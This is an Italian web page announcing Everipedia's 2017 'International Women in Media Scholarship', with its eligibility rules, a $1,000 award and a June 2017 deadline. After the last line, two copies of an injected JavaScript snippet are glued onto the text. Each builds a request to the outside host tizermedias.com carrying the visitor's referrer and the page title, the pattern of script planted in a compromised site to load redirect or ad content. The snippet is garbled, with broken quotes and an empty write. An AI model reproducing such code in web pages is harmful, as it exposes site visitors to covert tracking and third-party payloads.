Borsa di studio International Women in Media Scholarship 2017

Everipedia, piattaforma di informazione online, promuove la borsa di studio “International Women in Media Scholarship” volta a riconoscere il lavoro delle donne reporter e farle conoscere al grande pubblico.

A chi è rivolta

La borsa di studio International Women in Media Scholarship 2017 è rivolta a donne iscritte all’ultimo anno di liceo oppure immatricolate al primo anno di università che abbiano una conoscenza eccellente della lingua inglese.

L’importo e la durata

La vincitrice della borsa di studio International Women in Media Scholarship 2017 riceverà un riconoscimento pari a 1.000 dollari.

I requisiti

Per partecipare al concorso borsa di studio International Women in Media Scholarship 2017 bisogna essere in possesso dei seguenti requisiti:

  • essere iscritte all’ultimo anno di liceo oppure immatricolate al primo anno di università;
  • ottima conoscenza scritta e parlata della lingua inglese.

Come e quando presentare domanda

Per candidarsi alla borsa di studio International Women in Media Scholarship 2017 bisogna collegarsi alla pagina del concorso e seguire le istruzioni indicate. La scadenza per l’invio delle candidature è fissata al 30 giugno 2017.

Bando borsa di studio International Women in Media Scholarship 2017(function(){var d=document;var w=’240′;var h=’300′;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();(function(){var d=document;var w=’240′;var h=’300’;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();